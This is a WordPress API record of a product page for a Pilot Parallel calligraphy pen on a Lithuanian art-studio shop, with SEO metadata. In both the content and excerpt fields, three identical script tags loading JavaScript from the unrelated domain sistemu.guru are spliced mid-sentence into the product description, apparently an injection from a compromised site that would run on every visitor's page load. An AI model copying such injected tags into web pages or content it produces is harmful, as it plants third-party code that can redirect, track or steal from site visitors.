{"id":18316,"date":"2017-01-25T10:17:06","date_gmt":"2017-01-25T12:17:06","guid":{"rendered":"http:\/\/www.menustudija.lt\/product\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/"},"modified":"2025-01-29T16:18:59","modified_gmt":"2025-01-29T18:18:59","slug":"pilot-parallel-calligraphy-pen-1-5-mm-nib","status":"publish","type":"product","link":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/","title":{"rendered":"pilot parallel calligraphy pen &#8211;  1.5 mm nib"},"content":{"rendered":"<p>The Pilot Parallel Pen represents a major breakthrough in calligraphy pen design!<\/p>\n<p>The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.jetpens.com\/blog\/how-to-blend-colors-with-the-pilot-parallel-calligraphy-fountain-pens\/pt\/260\">blended color lines<\/a>.<\/p>\n<p>Four nib widths are available for your writing needs: 1.5 mm, 2.4 mm, 3.8 mm and 6.0 mm.<\/p>\n<p>The name &#8222;calligraphy&#8221; comes from the Greek words for &#8222;beautiful&#8221; (calli) and &#8222;writing way&#8221; (graphy). Capture the charm of beautiful handwriting with this very cherished and unique form of expression!<\/p>\n<p>This pen includes one black ink cartridge, one red ink cartridge, one pen cleaner pipette, one nib cleaner, and an instructions pamphlet.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>he Pilot Parallel Pen represents a major breakthrough in calligraphy pen design!<\/p>\n<p>The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.jetpens.com\/blog\/how-to-blend-colors-with-the-pilot-parallel-calligraphy-fountain-pens\/pt\/260\">blended color lines<\/a>.<\/p>\n<p>Four nib widths are available for your writing needs: 1.5 mm, 2.4 mm, 3.8 mm and 6.0 mm.<\/p>\n<p>The name &#8222;calligraphy&#8221; comes from the Greek words for &#8222;beautiful&#8221; (calli) and &#8222;writing way&#8221; (graphy). Capture the charm of beautiful handwriting with this very cherished and unique form of expression!<\/p>\n","protected":false},"featured_media":18398,"template":"","meta":[],"product_brand":[],"product_cat":[59,60],"product_tag":[],"class_list":{"0":"post-18316","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-kaligrafijos-reikmenys","7":"product_cat-rasikliai-ir-parkeriai","9":"first","10":"instock","11":"taxable","12":"shipping-taxable","13":"purchasable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/\" \/>\n<meta property=\"og:locale\" content=\"lt_LT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"og:description\" content=\"he Pilot Parallel Pen represents a major breakthrough in calligraphy pen design!  The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create blended color lines.  Four nib widths are available for your writing needs: 1.5 mm, 2.4 mm, 3.8 mm and 6.0 mm.  The name &quot;calligraphy&quot; comes from the Greek words for &quot;beautiful&quot; (calli) and &quot;writing way&quot; (graphy). Capture the charm of beautiful handwriting with this very cherished and unique form of expression!\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/\" \/>\n<meta property=\"og:site_name\" content=\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"article:modified_time\" content=\"2025-01-29T18:18:59+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minut\u0117\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/\",\"name\":\"pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"isPartOf\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg\",\"datePublished\":\"2017-01-25T12:17:06+00:00\",\"dateModified\":\"2025-01-29T18:18:59+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#breadcrumb\"},\"inLanguage\":\"lt-LT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg\",\"width\":600,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/www.menustudija.lt\/lt\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"pilot parallel calligraphy pen &#8211; 1.5 mm nib\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"description\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui\",\"publisher\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"lt-LT\"},{\"@type\":\"Organization\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"width\":2560,\"height\":768,\"caption\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/","og_locale":"lt_LT","og_type":"article","og_title":"pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","og_description":"he Pilot Parallel Pen represents a major breakthrough in calligraphy pen design!  The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create blended color lines.  Four nib widths are available for your writing needs: 1.5 mm, 2.4 mm, 3.8 mm and 6.0 mm.  The name \"calligraphy\" comes from the Greek words for \"beautiful\" (calli) and \"writing way\" (graphy). Capture the charm of beautiful handwriting with this very cherished and unique form of expression!","og_url":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/","og_site_name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","article_modified_time":"2025-01-29T18:18:59+00:00","og_image":[{"width":600,"height":400,"url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minut\u0117"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/","url":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/","name":"pilot parallel calligraphy pen - 1.5 mm nib - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","isPartOf":{"@id":"http:\/\/www.menustudija.lt\/lt\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage"},"thumbnailUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg","datePublished":"2017-01-25T12:17:06+00:00","dateModified":"2025-01-29T18:18:59+00:00","breadcrumb":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#breadcrumb"},"inLanguage":"lt-LT","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/"]}]},{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#primaryimage","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/75246.jpg","width":600,"height":400},{"@type":"BreadcrumbList","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-1-5-mm-nib\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/www.menustudija.lt\/lt\/"},{"@type":"ListItem","position":2,"name":"pilot parallel calligraphy pen &#8211; 1.5 mm nib"}]},{"@type":"WebSite","@id":"http:\/\/www.menustudija.lt\/lt\/#website","url":"http:\/\/www.menustudija.lt\/lt\/","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","description":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui","publisher":{"@id":"http:\/\/www.menustudija.lt\/lt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"lt-LT"},{"@type":"Organization","@id":"http:\/\/www.menustudija.lt\/lt\/#organization","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","url":"http:\/\/www.menustudija.lt\/lt\/","logo":{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","width":2560,"height":768,"caption":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product\/18316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product"}],"about":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media\/18398"}],"wp:attachment":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media?parent=18316"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_brand?post=18316"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_cat?post=18316"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_tag?post=18316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}